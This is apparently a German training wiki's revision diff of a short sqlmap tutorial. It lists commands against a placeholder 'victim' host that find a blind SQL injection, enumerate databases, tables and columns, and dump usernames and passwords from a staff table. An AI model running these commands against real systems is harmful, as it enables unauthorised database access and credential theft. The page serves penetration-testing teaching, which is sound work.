Sqlmap Anwenden: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 4: Zeile 4:
 
=Datenbanken anzeigen (optional)=
 
=Datenbanken anzeigen (optional)=
  
*sqlmap -u "http://victim/sql-blind.php?plain=1" --data="username=hans" --dbs --batch --string=VALID
+
sqlmap -u "http://victim/sql-blind.php?plain=1" --data="username=hans" --dbs --batch --string=VALID
  
 
=Verwundbarkeit bestätigen=
 
=Verwundbarkeit bestätigen=
  
*sqlmap -u "http://victim/sql-blind.php?plain=1" --data="username=hans" --technique=B --batch --string=VALID
+
*sqlmap -u "http://victim/sql-blind.php?plain=1" --data="username=hans" --batch --string=VALID --flush-session
  
 
=Tabellen der Datenbank tuxmen=
 
=Tabellen der Datenbank tuxmen=
Zeile 20: Zeile 20:
 
=Daten dumpen=
 
=Daten dumpen=
  
*sqlmap -u "http://victim/sql-blind.php?plain=1" --data="username=hans" -D tuxmen -T mitarbeiter -C username,password --dump --batch --string=VALID
+
*sqlmap -u "http://victim/sql-blind.php?plain=1" --data="username=hans" -D tuxmen -T mitarbeiter -C username,password --dump --batch --string=VALID

Version vom 24. Juni 2026, 13:32 Uhr

Ausgabe aller Parameter und Optionen

  • sqlmap -hh

Datenbanken anzeigen (optional)

sqlmap -u "http://victim/sql-blind.php?plain=1" --data="username=hans" --dbs --batch --string=VALID

Verwundbarkeit bestätigen

Tabellen der Datenbank tuxmen

Spalten der Tabelle mitarbeiter

Daten dumpen